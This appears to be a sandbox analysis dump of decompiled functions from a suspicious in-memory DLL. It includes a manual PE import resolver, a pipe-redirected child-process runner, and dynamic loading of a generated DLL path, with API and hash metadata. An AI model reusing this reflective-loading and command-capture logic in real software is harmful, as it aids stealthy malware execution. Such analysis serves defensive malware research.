    			E1001220A(char* __eax, char** _a4, long long* _a8) {
    				char* _v8;
    				long long _v16;
    				char* _t9;
    				signed char _t11;
    				char** _t19;
    				char _t22;
    				long long _t32;
    				long long _t33;
    
    				_t9 = __eax;
    				L100122D8();
    				_t19 = _a4;
    				_t22 =  *__eax;
    				if( *_t22 != 0x2e) {
    					_t9 = strchr( *_t19, 0x2e);
    					if(_t9 != 0) {
    						 *_t9 =  *_t22;
    					}
    				}
    				L1001229C();
    				 *_t9 =  *_t9 & 0x00000000;
    				_t11 = strtod( *_t19,  &_v8);
    				asm("fst qword [ebp-0xc]");
    				_t32 =  *0x10018248;
    				asm("fucomp st1");
    				asm("fnstsw ax");
    				if((_t11 & 0x00000044) != 0) {
    					L5:
    					st0 = _t32;
    					L1001229C();
    					if( *_t11 != 0x22) {
    						_t33 = _v16;
    						goto L8;
    					} else {
    						return _t11 | 0xffffffff;
    					}
    				} else {
    					_t33 =  *0x10018250;
    					asm("fucomp st1");
    					asm("fnstsw ax");
    					if((_t11 & 0x00000044) != 0) {
    						L8:
    						 *_a8 = _t33;
    						return 0;
    					} else {
    						goto L5;
    					}
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: _errno$localeconvstrchrstrtod
    • String ID:
    • API String ID: 1035490122-0
    • Opcode ID: bc4233f11c00668a7001d9a98d59c6705406a7d7ae7faa33f9dc9bcaca41ff71
    • Instruction ID: bc1e6689561b9e656043b1385d2f50dc6362d0c3bb2d0ffc00f4b959df95ecfa
    • Opcode Fuzzy Hash: bc4233f11c00668a7001d9a98d59c6705406a7d7ae7faa33f9dc9bcaca41ff71
    • Instruction Fuzzy Hash: 4801D8B9900145BADB12DF64D90169D7BA4EF4B364F2141D0E9806F1E1CB74D5F5C7A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E1000CF8F(void* __ecx) {
    				intOrPtr _t11;
    				long _t12;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				struct _OSVERSIONINFOA* _t29;
    
    				_push(__ecx);
    				_t29 =  *0x1001e688; // 0x2ff04a0
    				GetCurrentProcess();
    				_t11 = E1000B9EB();
    				_t1 = _t29 + 0x1644; // 0x2ff1ae4
    				_t25 = _t1;
    				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
    				_t12 = GetModuleFileNameW(0, _t1, 0x105);
    				_t33 = _t12;
    				if(_t12 != 0) {
    					_t12 = E10008FA4(_t25, _t33);
    				}
    				_t3 = _t29 + 0x228; // 0x2ff06c8
    				 *(_t29 + 0x1854) = _t12;
    				 *((intOrPtr*)(_t29 + 0x434)) = E10008FA4(_t3, _t33);
    				memset(_t29, 0, 0x9c);
    				_t29->dwOSVersionInfoSize = 0x9c;
    				GetVersionExA(_t29);
    				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
    				_t17 = E1000E3C1(_t3);
    				_t7 = _t29 + 0x220; // 0x2ff06c0
    				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
    				_t18 = E1000E3FC(_t7);
    				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
    				return _t18;
    			}

    APIs
    • GetCurrentProcess.KERNEL32(?,?,02FF04A0,?,1000353A), ref: 1000CF9B
    • GetModuleFileNameW.KERNEL32(00000000,02FF1AE4,00000105,?,?,02FF04A0,?,1000353A), ref: 1000CFBC
    • memset.MSVCRT ref: 1000CFED
    • GetVersionExA.KERNEL32(02FF04A0,02FF04A0,?,1000353A), ref: 1000CFF8
    • GetCurrentProcessId.KERNEL32(?,1000353A), ref: 1000CFFE
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CurrentProcess$FileModuleNameVersionmemset
    • String ID:
    • API String ID: 3581039275-0
    • Opcode ID: 96b6ec85a81724162f27d91dfa04e4579c29a66ef21a4bceb47efb7bfb55a1a4
    • Instruction ID: b585eaf47835b1e69fe94979de649fd9c2e4cab01659644ccb5f3879e9bd62b3
    • Opcode Fuzzy Hash: 96b6ec85a81724162f27d91dfa04e4579c29a66ef21a4bceb47efb7bfb55a1a4
    • Instruction Fuzzy Hash: DC019E749017149BE760DF308C8ABEABBE5EF94350F00082DF59693251EB70B705CB55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E1000A99D(signed int __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				struct _SECURITY_ATTRIBUTES _v48;
    				intOrPtr _v60;
    				char _v64;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				void* _v84;
    				short _v92;
    				intOrPtr _v96;
    				void _v140;
    				intOrPtr _t77;
    				void* _t79;
    				intOrPtr _t85;
    				intOrPtr _t87;
    				intOrPtr _t89;
    				intOrPtr _t92;
    				intOrPtr _t98;
    				intOrPtr _t100;
    				intOrPtr _t102;
    				long _t111;
    				intOrPtr _t115;
    				intOrPtr _t126;
    				void* _t127;
    				void* _t128;
    				void* _t129;
    				void* _t130;
    
    				_t111 = 0;
    				_v24 = __ecx;
    				_v12 = 0;
    				_v20 = 0;
    				_t127 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				_v48.nLength = 0xc;
    				_v48.lpSecurityDescriptor = 0;
    				_v48.bInheritHandle = 1;
    				_v28 = 0;
    				memset( &_v140, 0, 0x44);
    				asm("stosd");
    				_t130 = _t129 + 0xc;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
    					L18:
    					return 0;
    				}
    				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
    					L13:
    					E10008600( &_v28, 0);
    					if(_v20 != 0) {
    						_t77 =  *0x1001e684; // 0x306f878
    						 *((intOrPtr*)(_t77 + 0x30))(_v20);
    					}
    					if(_v8 != 0) {
    						_t115 =  *0x1001e684; // 0x306f878
    						 *((intOrPtr*)(_t115 + 0x30))(_v8);
    					}
    					return _t111;
    				}
    				_t79 = _v16;
    				_v76 = _t79;
    				_v80 = _t79;
    				_v84 = _v12;
    				_v140 = 0x44;
    				_v96 = 0x101;
    				_v92 = 0;
    				_t126 = E100085EA(0x1001);
    				_v28 = _t126;
    				if(_t126 == 0) {
    					goto L18;
    				}
    				_push( &_v64);
    				_push( &_v140);
    				_t85 =  *0x1001e684; // 0x306f878
    				_push(0);
    				_push(0);
    				_push(0x8000000);
    				_push(1);
    				_push(0);
    				_push(0);
    				_push(_v24);
    				_push(0);
    				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
    					goto L13;
    				}
    				_t87 =  *0x1001e684; // 0x306f878
    				 *((intOrPtr*)(_t87 + 0x30))(_v12);
    				_t89 =  *0x1001e684; // 0x306f878
    				 *((intOrPtr*)(_t89 + 0x30))(_v16);
    				_v24 = _v24 & 0;
    				do {
    					_t92 =  *0x1001e684; // 0x306f878
    					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
    					 *((char*)(_v24 + _t126)) = 0;
    					if(_t111 == 0) {
    						_t127 = E1000918C(_t126, 0);
    					} else {
    						_push(0);
    						_push(_t126);
    						_v32 = _t127;
    						_t127 = E10009278(_t127);
    						E10008600( &_v32, 0xffffffff);
    						_t130 = _t130 + 0x14;
    					}
    					_t111 = _t127;
    					_v32 = _t127;
    				} while (_v36 != 0);
    				_push( &_v36);
    				_push(E1000C384(_t127));
    				_t98 =  *0x1001e68c; // 0x306fa40
    				_push(_t127);
    				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
    					L12:
    					_t100 =  *0x1001e684; // 0x306f878
    					 *((intOrPtr*)(_t100 + 0x30))(_v64);
    					_t102 =  *0x1001e684; // 0x306f878
    					 *((intOrPtr*)(_t102 + 0x30))(_v60);
    					goto L13;
    				}
    				_t128 = E1000923C(_t127);
    				if(_t128 == 0) {
    					goto L12;
    				}
    				E10008600( &_v32, 0);
    				return _t128;
    			}

    APIs
    • memset.MSVCRT ref: 1000A9DA
    • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000A9FE
    • CreatePipe.KERNEL32(1000658F,?,0000000C,00000000), ref: 1000AA15
      • Part of subcall function 100085EA: HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
      • Part of subcall function 10008600: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006020), ref: 10008646
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateHeapPipe$AllocFreememset
    • String ID: D
    • API String ID: 488076629-2746444292
    • Opcode ID: eb987a04adcae8d8c5b90a31cbc9f8d815262693b6639f398634e887f722e0f0
    • Instruction ID: 746ba47fdd6cc5b050f282edc2f958d2642d0c94e781aeb0ddd390b9b3935c5a
    • Opcode Fuzzy Hash: eb987a04adcae8d8c5b90a31cbc9f8d815262693b6639f398634e887f722e0f0
    • Instruction Fuzzy Hash: 59511672900219AFEB41CFA8CC85FDEBBB9FB08380F514169F500E7255DB74AA458B65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E100124A6(signed int __eax, intOrPtr _a4) {
    				intOrPtr* _v8;
    				signed int* _v12;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				intOrPtr _v32;
    				struct HINSTANCE__* _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				struct HINSTANCE__* _v48;
    				intOrPtr _v52;
    				signed int _v56;
    				intOrPtr _v60;
    				signed int _v64;
    				signed int _t109;
    				signed int _t112;
    				signed int _t115;
    				void* _t163;
    
    				_v44 = _v44 & 0x00000000;
    				if(_a4 != 0) {
    					_v48 = GetModuleHandleA("kernel32.dll");
    					_v40 = E1000E0A4(_v48, "GetProcAddress");
    					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    					_v32 = _v52;
    					_t109 = 8;
    					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
    						L24:
    						return 0;
    					}
    					_v56 = 0x80000000;
    					_t112 = 8;
    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
    						_v8 = _v8 + 0x14;
    					}
    					_t115 = 8;
    					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
    					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
    						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
    						if(_v36 != 0) {
    							if( *_v8 == 0) {
    								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
    							} else {
    								_v12 =  *_v8 + _a4;
    							}
    							_v28 = _v28 & 0x00000000;
    							while( *_v12 != 0) {
    								_v24 = _v24 & 0x00000000;
    								_v16 = _v16 & 0x00000000;
    								_v64 = _v64 & 0x00000000;
    								_v20 = _v20 & 0x00000000;
    								if(( *_v12 & _v56) == 0) {
    									_v60 =  *_v12 + _a4;
    									_v20 = _v60 + 2;
    									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
    									_v16 = _v40(_v36, _v20);
    								} else {
    									_v24 =  *_v12;
    									_v20 = _v24 & 0x0000ffff;
    									_v16 = _v40(_v36, _v20);
    								}
    								if(_v24 != _v16) {
    									_v44 = _v44 + 1;
    									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
    										 *_v12 = _v16;
    									} else {
    										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
    									}
    								}
    								_v12 =  &(_v12[1]);
    								_v28 = _v28 + 4;
    							}
    							_v8 = _v8 + 0x14;
    							continue;
    						}
    						_t163 = 0xfffffffd;
    						return _t163;
    					}
    					goto L24;
    				}
    				return __eax | 0xffffffff;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124C3
    • LoadLibraryA.KERNEL32(00000000), ref: 1001255C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: HandleLibraryLoadModule
    • String ID: GetProcAddress$kernel32.dll
    • API String ID: 4133054770-1584408056
    • Opcode ID: bb4e68213c562c1fa801193cd89b89bf52a2a92629122bc31f0ff2ef10cdd317
    • Instruction ID: 07b277518937ab197daabd61ad14ff0b0aa7506dcab8f797d25a3703402acd83
    • Opcode Fuzzy Hash: bb4e68213c562c1fa801193cd89b89bf52a2a92629122bc31f0ff2ef10cdd317
    • Instruction Fuzzy Hash: 73617CB5D00209EFDB40CF98C985BADBBF1FF08355F208599E815AB2A1D374AA90DF54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E1000C4D9(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				void _v140;
    				signed char _t14;
    				char _t15;
    				intOrPtr _t20;
    				void* _t25;
    				intOrPtr _t26;
    				intOrPtr _t32;
    				WCHAR* _t34;
    				intOrPtr _t35;
    				struct HINSTANCE__* _t37;
    				int _t38;
    				intOrPtr _t46;
    				void* _t47;
    				intOrPtr _t50;
    				void* _t60;
    				void* _t61;
    				char _t62;
    				char* _t63;
    				void* _t65;
    				intOrPtr _t66;
    				char _t68;
    
    				_t65 = __esi;
    				_t61 = __edi;
    				_t47 = __ebx;
    				_t50 =  *0x1001e688; // 0x2ff04a0
    				_t14 =  *(_t50 + 0x1898);
    				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
    					_t15 = E100095C7(_t50, 0xb62);
    					_t66 =  *0x1001e688; // 0x2ff04a0
    					_t62 = _t15;
    					_t67 = _t66 + 0xb0;
    					_v8 = _t62;
    					E10009626( &_v140, 0x40, L"%08x", E1000D40B(_t66 + 0xb0, E1000C384(_t66 + 0xb0), 0));
    					_t20 =  *0x1001e688; // 0x2ff04a0
    					asm("sbb eax, eax");
    					_t25 = E100095C7(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
    					_t63 = "\\";
    					_t26 =  *0x1001e688; // 0x2ff04a0
    					_t68 = E100092CB(_t26 + 0x1020);
    					_v12 = _t68;
    					E100085BB( &_v8);
    					_t32 =  *0x1001e688; // 0x2ff04a0
    					_t34 = E100092CB(_t32 + 0x122a);
    					 *0x1001e784 = _t34;
    					_t35 =  *0x1001e684; // 0x306f878
    					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
    					_t37 = LoadLibraryW( *0x1001e784);
    					 *0x1001e77c = _t37;
    					if(_t37 == 0) {
    						_t38 = 0;
    					} else {
    						_push(_t37);
    						_t60 = 0x28;
    						_t38 = E1000E17C(0x1001bb40, _t60);
    					}
    					 *0x1001e780 = _t38;
    					E10008600( &_v12, 0xfffffffe);
    					memset( &_v140, 0, 0x80);
    					if( *0x1001e780 != 0) {
    						goto L10;
    					} else {
    						E10008600(0x1001e784, 0xfffffffe);
    						goto L8;
    					}
    				} else {
    					L8:
    					if( *0x1001e780 == 0) {
    						_t46 =  *0x1001e6bc; // 0x306f9a0
    						 *0x1001e780 = _t46;
    					}
    					L10:
    					return 1;
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: LibraryLoadmemset
    • String ID: %08x$dll
    • API String ID: 3406617148-2963171978
    • Opcode ID: 91e841e24daec67e8ecb29d903f94a861be21cf7acbef824887372b7a56b7ddc
    • Instruction ID: 286451e2d6f5d77c3e96009a634a1e8f77bc4d61d346aa34e357d183eb196ad5
    • Opcode Fuzzy Hash: 91e841e24daec67e8ecb29d903f94a861be21cf7acbef824887372b7a56b7ddc
    • Instruction Fuzzy Hash: 9231E1B2904658AFF700CB68DC89F9E73ECEB58394F508129F105E7195EB34EE848B24
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E10012D80(int _a4, signed int _a8) {
    				int _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				void* __esi;
    				void* _t137;
    				signed int _t141;
    				intOrPtr* _t142;
    				signed int _t145;
    				signed int _t146;
    				intOrPtr _t151;
    				intOrPtr _t161;
    				intOrPtr _t162;
    				intOrPtr _t167;
    				intOrPtr _t170;
    				signed int _t172;
    				intOrPtr _t173;
    				int _t184;
    				intOrPtr _t185;
    				intOrPtr _t188;
    				signed int _t189;
    				void* _t195;
    				int _t202;
    				int _t208;
    				intOrPtr _t217;
    				signed int _t218;
    				int _t219;
    				intOrPtr _t220;
    				signed int _t221;
    				signed int _t222;
    				int _t224;
    				int _t225;
    				signed int _t227;
    				intOrPtr _t228;
    				int _t232;
    				int _t234;
    				signed int _t235;
    				int _t239;
    				void* _t240;
    				int _t245;
    				int _t252;
    				signed int _t253;
    				int _t254;
    				void* _t257;
    				void* _t258;
    				int _t259;
    				intOrPtr _t260;
    				int _t261;
    				signed int _t269;
    				signed int _t271;
    				intOrPtr* _t272;
    				void* _t273;
    
    				_t253 = _a8;
    				_t272 = _a4;
    				_t3 = _t272 + 0xc; // 0x452bf84d
    				_t4 = _t272 + 0x2c; // 0x8df075ff
    				_t228 =  *_t4;
    				_t137 =  *_t3 + 0xfffffffb;
    				_t229 =  <=  ? _t137 : _t228;
    				_v16 =  <=  ? _t137 : _t228;
    				_t269 = 0;
    				_a4 =  *((intOrPtr*)( *_t272 + 4));
    				asm("o16 nop [eax+eax]");
    				while(1) {
    					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
    					_t141 =  *_t8 + 0x2a >> 3;
    					_v12 = 0xffff;
    					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
    					if(_t217 < _t141) {
    						break;
    					}
    					_t11 = _t272 + 0x6c; // 0xa1ec8b55
    					_t12 = _t272 + 0x5c; // 0x5fe85000
    					_t245 =  *_t11 -  *_t12;
    					_v8 = _t245;
    					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
    					_t247 =  <  ? _t195 : _v12;
    					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
    					if(_t227 >= _v16) {
    						L7:
    						if(_t253 != 4) {
    							L10:
    							_t269 = 0;
    							__eflags = 0;
    						} else {
    							_t285 = _t227 - _t195;
    							if(_t227 != _t195) {
    								goto L10;
    							} else {
    								_t269 = _t253 - 3;
    							}
    						}
    						E10015DA0(_t272, _t272, 0, 0, _t269);
    						_t18 = _t272 + 0x14; // 0xc703f045
    						_t19 = _t272 + 8; // 0x8d000040
    						 *( *_t18 +  *_t19 - 4) = _t227;
    						_t22 = _t272 + 0x14; // 0xc703f045
    						_t23 = _t272 + 8; // 0x8d000040
    						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
    						_t26 = _t272 + 0x14; // 0xc703f045
    						_t27 = _t272 + 8; // 0x8d000040
    						 *( *_t26 +  *_t27 - 2) =  !_t227;
    						_t30 = _t272 + 0x14; // 0xc703f045
    						_t31 = _t272 + 8; // 0x8d000040
    						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
    						E10014B00(_t285,  *_t272);
    						_t202 = _v8;
    						_t273 = _t273 + 0x14;
    						if(_t202 != 0) {
    							_t208 =  >  ? _t227 : _t202;
    							_v8 = _t208;
    							_t36 = _t272 + 0x38; // 0xf47d8bff
    							_t37 = _t272 + 0x5c; // 0x5fe85000
    							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
    							_t273 = _t273 + 0xc;
    							_t252 = _v8;
    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
    							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
    							_t227 = _t227 - _t252;
    						}
    						if(_t227 != 0) {
    							E10014C40( *_t272,  *( *_t272 + 0xc), _t227);
    							_t273 = _t273 + 0xc;
    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
    						}
    						_t253 = _a8;
    						if(_t269 == 0) {
    							continue;
    						}
    					} else {
    						if(_t227 != 0 || _t253 == 4) {
    							if(_t253 != 0 && _t227 == _t195) {
    								goto L7;
    							}
    						}
    					}
    					break;
    				}
    				_t142 =  *_t272;
    				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
    				_a4 = _t232;
    				if(_t232 == 0) {
    					_t83 = _t272 + 0x6c; // 0xa1ec8b55
    					_t254 =  *_t83;
    				} else {
    					_t59 = _t272 + 0x2c; // 0x8df075ff
    					_t224 =  *_t59;
    					if(_t232 < _t224) {
    						_t65 = _t272 + 0x3c; // 0x830cc483
    						_t66 = _t272 + 0x6c; // 0xa1ec8b55
    						_t260 =  *_t66;
    						__eflags =  *_t65 - _t260 - _t232;
    						if( *_t65 - _t260 <= _t232) {
    							_t67 = _t272 + 0x38; // 0xf47d8bff
    							_t261 = _t260 - _t224;
    							 *(_t272 + 0x6c) = _t261;
    							memcpy( *_t67,  *_t67 + _t224, _t261);
    							_t70 = _t272 + 0x16b0; // 0xdf750008
    							_t188 =  *_t70;
    							_t273 = _t273 + 0xc;
    							_t232 = _a4;
    							__eflags = _t188 - 2;
    							if(_t188 < 2) {
    								_t189 = _t188 + 1;
    								__eflags = _t189;
    								 *(_t272 + 0x16b0) = _t189;
    							}
    						}
    						_t73 = _t272 + 0x38; // 0xf47d8bff
    						_t74 = _t272 + 0x6c; // 0xa1ec8b55
    						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
    						_t225 = _a4;
    						_t273 = _t273 + 0xc;
    						_t76 = _t272 + 0x6c;
    						 *_t76 =  *(_t272 + 0x6c) + _t225;
    						__eflags =  *_t76;
    						_t78 = _t272 + 0x6c; // 0xa1ec8b55
    						_t184 =  *_t78;
    						_t79 = _t272 + 0x2c; // 0x8df075ff
    						_t239 =  *_t79;
    					} else {
    						 *(_t272 + 0x16b0) = 2;
    						_t61 = _t272 + 0x38; // 0xf47d8bff
    						memcpy( *_t61,  *_t142 - _t224, _t224);
    						_t62 = _t272 + 0x2c; // 0x8df075ff
    						_t184 =  *_t62;
    						_t273 = _t273 + 0xc;
    						_t225 = _a4;
    						_t239 = _t184;
    						 *(_t272 + 0x6c) = _t184;
    					}
    					_t254 = _t184;
    					 *(_t272 + 0x5c) = _t184;
    					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
    					_t185 =  *_t81;
    					_t240 = _t239 - _t185;
    					_t241 =  <=  ? _t225 : _t240;
    					_t242 = ( <=  ? _t225 : _t240) + _t185;
    					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
    				}
    				if( *(_t272 + 0x16c0) < _t254) {
    					 *(_t272 + 0x16c0) = _t254;
    				}
    				if(_t269 == 0) {
    					_t218 = _a8;
    					__eflags = _t218;
    					if(_t218 == 0) {
    						L34:
    						_t89 = _t272 + 0x3c; // 0x830cc483
    						_t219 =  *_t272;
    						_t145 =  *_t89 - _t254 - 1;
    						_a4 =  *_t272;
    						_t234 = _t254;
    						_v16 = _t145;
    						_v8 = _t254;
    						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
    						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
    							_v8 = _t254;
    							_t95 = _t272 + 0x5c; // 0x5fe85000
    							_a4 = _t219;
    							_t234 = _t254;
    							_t97 = _t272 + 0x2c; // 0x8df075ff
    							__eflags =  *_t95 -  *_t97;
    							if( *_t95 >=  *_t97) {
    								_t98 = _t272 + 0x2c; // 0x8df075ff
    								_t167 =  *_t98;
    								_t259 = _t254 - _t167;
    								_t99 = _t272 + 0x38; // 0xf47d8bff
    								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
    								 *(_t272 + 0x6c) = _t259;
    								memcpy( *_t99, _t167 +  *_t99, _t259);
    								_t103 = _t272 + 0x16b0; // 0xdf750008
    								_t170 =  *_t103;
    								_t273 = _t273 + 0xc;
    								__eflags = _t170 - 2;
    								if(_t170 < 2) {
    									_t172 = _t170 + 1;
    									__eflags = _t172;
    									 *(_t272 + 0x16b0) = _t172;
    								}
    								_t106 = _t272 + 0x2c; // 0x8df075ff
    								_t145 = _v16 +  *_t106;
    								__eflags = _t145;
    								_a4 =  *_t272;
    								_t108 = _t272 + 0x6c; // 0xa1ec8b55
    								_t234 =  *_t108;
    								_v8 = _t234;
    							}
    						}
    						_t255 = _a4;
    						_t220 =  *((intOrPtr*)(_a4 + 4));
    						__eflags = _t145 - _t220;
    						_t221 =  <=  ? _t145 : _t220;
    						_t146 = _t221;
    						_a4 = _t221;
    						_t222 = _a8;
    						__eflags = _t146;
    						if(_t146 != 0) {
    							_t114 = _t272 + 0x38; // 0xf47d8bff
    							E10014C40(_t255,  *_t114 + _v8, _t146);
    							_t273 = _t273 + 0xc;
    							_t117 = _t272 + 0x6c;
    							 *_t117 =  *(_t272 + 0x6c) + _a4;
    							__eflags =  *_t117;
    							_t119 = _t272 + 0x6c; // 0xa1ec8b55
    							_t234 =  *_t119;
    						}
    						__eflags =  *(_t272 + 0x16c0) - _t234;
    						if( *(_t272 + 0x16c0) < _t234) {
    							 *(_t272 + 0x16c0) = _t234;
    						}
    						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
    						_t123 = _t272 + 0xc; // 0x452bf84d
    						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
    						__eflags = _t257 - 0xffff;
    						_t258 =  >  ? 0xffff : _t257;
    						_t124 = _t272 + 0x2c; // 0x8df075ff
    						_t151 =  *_t124;
    						_t125 = _t272 + 0x5c; // 0x5fe85000
    						_t235 = _t234 -  *_t125;
    						__eflags = _t258 - _t151;
    						_t152 =  <=  ? _t258 : _t151;
    						__eflags = _t235 - ( <=  ? _t258 : _t151);
    						if(_t235 >= ( <=  ? _t258 : _t151)) {
    							L49:
    							__eflags = _t235 - _t258;
    							_t154 =  >  ? _t258 : _t235;
    							_a4 =  >  ? _t258 : _t235;
    							__eflags = _t222 - 4;
    							if(_t222 != 4) {
    								L53:
    								_t269 = 0;
    								__eflags = 0;
    							} else {
    								_t161 =  *_t272;
    								__eflags =  *(_t161 + 4);
    								_t154 = _a4;
    								if( *(_t161 + 4) != 0) {
    									goto L53;
    								} else {
    									__eflags = _t154 - _t235;
    									if(_t154 != _t235) {
    										goto L53;
    									} else {
    										_t269 = _t222 - 3;
    									}
    								}
    							}
    							_t131 = _t272 + 0x38; // 0xf47d8bff
    							_t132 = _t272 + 0x5c; // 0x5fe85000
    							E10015DA0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
    							_t134 = _t272 + 0x5c;
    							 *_t134 =  *(_t272 + 0x5c) + _a4;
    							__eflags =  *_t134;
    							E10014B00( *_t134,  *_t272);
    						} else {
    							__eflags = _t235;
    							if(_t235 != 0) {
    								L46:
    								__eflags = _t222;
    								if(_t222 != 0) {
    									_t162 =  *_t272;
    									__eflags =  *(_t162 + 4);
    									if( *(_t162 + 4) == 0) {
    										__eflags = _t235 - _t258;
    										if(_t235 <= _t258) {
    											goto L49;
    										}
    									}
    								}
    							} else {
    								__eflags = _t222 - 4;
    								if(_t222 == 4) {
    									goto L46;
    								}
    							}
    						}
    						asm("sbb edi, edi");
    						_t271 =  ~_t269 & 0x00000002;
    						__eflags = _t271;
    						return _t271;
    					} else {
    						__eflags = _t218 - 4;
    						if(_t218 == 4) {
    							goto L34;
    						} else {
    							_t173 =  *_t272;
    							__eflags =  *(_t173 + 4);
    							if( *(_t173 + 4) != 0) {
    								goto L34;
    							} else {
    								_t88 = _t272 + 0x5c; // 0x5fe85000
    								__eflags = _t254 -  *_t88;
    								if(_t254 !=  *_t88) {
    									goto L34;
    								} else {
    									return 1;
    								}
    							}
    						}
    					}
    				} else {
    					return 3;
    				}
    			}


    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: memcpy
    • String ID:
    • API String ID: 3510742995-0
    • Opcode ID: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
    • Instruction ID: 73544d1bf8d56d5a7bbbe12107b863a73eec727039acdfdce1cff8ad1696c42c
    • Opcode Fuzzy Hash: 6b99f785ef5bb432ba68396c877eb0d4086885f26b78ddb0bfc44904db9e768b
